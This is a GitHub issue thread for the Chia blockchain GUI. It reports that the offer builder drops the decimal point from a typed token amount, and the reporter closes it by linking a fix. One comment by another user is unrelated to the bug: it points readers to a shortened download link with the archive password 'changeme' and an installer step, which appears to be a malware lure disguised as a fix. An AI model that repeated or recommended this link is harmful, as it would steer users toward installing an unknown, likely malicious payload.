### ISSUE TITLE
[Bug] Input amount of a token in offer builder changes unexpectedly

### ISSUE THREAD

**Issue by ChiaMineJP** [Chia-Network/chia-blockchain-gui#2461]
### What happened?

when typed "6.75" into the requesting side of an offer builder and then selected Base Warped USDC then I got 675 - decimal is removed...

![paste](https://github.com/user-attachments/assets/bbb019d7-cc7f-4614-9404-7afe568d3156)

### Version

unknown

### What platform are you using?

Windows

### What ui mode are you using?

GUI

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ChiaMineJP** [comment]
Fixed by https://github.com/Chia-Network/chia-blockchain-gui/pull/2462
